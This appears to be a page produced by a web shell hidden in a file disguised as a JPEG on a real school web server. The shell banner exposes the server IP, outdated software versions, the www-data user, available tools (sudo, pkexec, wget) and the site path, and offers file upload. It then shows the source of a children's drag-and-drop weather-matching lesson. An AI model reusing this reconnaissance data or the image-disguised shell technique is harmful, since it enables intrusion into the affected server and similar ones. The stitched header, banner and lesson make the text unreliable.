????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.135.224.139 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old8/Html/LevelE/Category3/ |
Upload File : |
<!doctype html> <html> <head> <title>Match the weather by looking at the picture</title> <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script> <script> function page_preLoad() { shared_setDeviceTypeLevelCategoryLastLesson(Level.E, Category.No3); shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta'); shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.E, Category.No3, '6a'), true, true); shared_setFooterTable('id_tblFooter', true, true, false, true, true); var ids_headings = ['id_td_heading1']; var ids_boxes = ['id_dropBox_weatherSymbols', 'id_dropBox_weatherReport', 'id_dropBox_thermometer']; var ids_options = ['id_td_weatherReport', 'id_td_thermometer', 'id_td_weatherSymbols']; var ids_spans = ['id_span_weatherReport', 'id_span_thermometer', 'id_span_weatherSymbols']; var ids_All = ids_headings.concat(ids_boxes, ids_spans); shared_adjust_fontSize_for_ids_all_devices(ids_All, 70); shared_adjust_fontSize_for_ids_all_devices(ids_options, 70); shared_init_dropBox_tds_with_drag_here(ids_boxes); shared_init_dropping_spans(ids_spans); } function page_onLoad() { } function btnPrevious_click() { window.location = 'LevelECat3Lesson05.html'; } function btnNext_click() { window.location = 'LevelECat3Lesson06b.html'; } function btnHome_click() { shared_btnHomeCategories_click('LevelE'); } function DragDrop(id_dropBox, ids_array) { if (shared_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array)) { shared_setTextAndBackgroundColorToGreenAndIsMovedTrue(shared_currentDropingId, id_dropBox); isAllInfosMovedShowClapsAnimation(); shared_set_currentDropingId_draggbleToFalse(); } else { shared_resetCurrentDroppingPosition(id_dropBox); } } function isAllInfosMovedShowClapsAnimation() { var ids_boxes = ['id_dropBox_weatherSymbols', 'id_dropBox_weatherReport', 'id_dropBox_thermometer']; shared_is_all_infos_filled_show_claps_animationWithIsFilled(ids_boxes); } </script> </head> <body onload="page_onLoad()"> <div id="shared_id_div_claps_image"> </div> <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0"> <tr height="8%"> <td> <div id="id_tblHeader"></div> </td> </tr> <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device --> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="2%"> <tr> <td> <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr> <td align="center" style="border:none"> <table id="id_tblSection1" width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="5%"> <td> <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border: none"> <tr> <td id="id_td_heading1" class="shared_style_options_blue_24px_bold" style="border: none"><span>Match the following:</span></td> </tr> </table> </td> </tr> <tr height="*"> <td width="65%"> <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border-collapse:collapse; border-left: 0px; border-bottom:none"> <tr style="border-top:none"> <td width="50%" style="border:none"> <table width="100%" height="100%" border="0" cellspacing="2%" cellpadding="0" style="padding-top: 0.2%; padding-bottom: 0.2%"> <tr id="id_tr_weatherSymbols" height="33.3%" ondragover="shared_highlight('id_dropBox_weatherSymbols'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropBox_weatherSymbols')" ondrop="DragDrop('id_dropBox_weatherSymbols', ['id_span_weatherSymbols'])"> <td width="50%" align="center" valign="middle"> <img id="id_img_weatherSymbols" src="../../../img/LevelE/Category3/LevelECat3Lesson06/weatherSymbols.png" width="70%" alt="" draggable="false"/> </td> <td id="id_dropBox_weatherSymbols" class="shared_style_red_24px_bold" width="*" align="center"> </td> </tr> <tr id="id_tr_weatherReport" height="33.3%" ondragover="shared_highlight('id_dropBox_weatherReport'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropBox_weatherReport')" ondrop="DragDrop('id_dropBox_weatherReport', ['id_span_weatherReport'])"> <td width="50%" align="center" valign="middle"> <img id="id_img_weatherReport" src="../../../img/LevelE/Category3/LevelECat3Lesson06/weatherReport.png" width="60%" alt="" draggable="false"/> </td> <td id="id_dropBox_weatherReport" class="shared_style_red_24px_bold" width="*" align="center"> </td> </tr> <tr id="id_tr_thermometer" height="*" ondragover="shared_highlight('id_dropBox_thermometer'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropBox_thermometer')" ondrop="DragDrop('id_dropBox_thermometer', ['id_span_thermometer'])"> <td width="50%" align="center" valign="middle"> <img id="id_img_thermometer" src="../../../img/LevelE/Category3/LevelECat3Lesson06/thermometer.png" width="45%" alt="" draggable="false"/> </td> <td id="id_dropBox_thermometer" class="shared_style_red_24px_bold" width="*" align="center"> </td> </tr> </table> </td> <td width="1%" style="border: 0px"> </td> </tr> </table> </td> <td width="*"> <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border-collapse:collapse; border-right:none; border-left:none; border-bottom:none"> <tr> <td style="border-right: 0px; border-bottom: 0px; border-left:none"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="33.3%"> <td id="id_td_weatherReport" align="center" class="shared_style_blue_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_weatherReport">Weather report</span> </td> </tr> <tr height="33.3%"> <td id="id_td_thermometer" align="center" class="shared_style_blue_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_thermometer">Thermometer</span> </td> </tr> <tr height="*"> <td id="id_td_weatherSymbols" align="center" class="shared_style_blue_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_weatherSymbols">Weather symbols</span> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="8%"> <td> <div id="id_tblFooter"></div> </td> </tr> </table> <script> page_preLoad(); new webkit_draggable('id_span_weatherReport', {handle : 'id_td_weatherReport', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_thermometer', {handle : 'id_td_thermometer', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_weatherSymbols', {handle : 'id_td_weatherSymbols', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); webkit_drop.add('id_tr_weatherReport', {onOver : function(){shared_highlight('id_dropBox_weatherReport')}, onOut : function(){shared_un_highlight('id_dropBox_weatherReport')}, onDrop : function(){DragDrop('id_dropBox_weatherReport', ['id_span_weatherReport'])}}); webkit_drop.add('id_tr_thermometer', {onOver : function(){shared_highlight('id_dropBox_thermometer')}, onOut : function(){shared_un_highlight('id_dropBox_thermometer')}, onDrop : function(){DragDrop('id_dropBox_thermometer', ['id_span_thermometer'])}}); webkit_drop.add('id_tr_weatherSymbols', {onOver : function(){shared_highlight('id_dropBox_weatherSymbols')}, onOut : function(){shared_un_highlight('id_dropBox_weatherSymbols')}, onDrop : function(){DragDrop('id_dropBox_weatherSymbols', ['id_span_weatherSymbols'])}}); </script> </body> </html>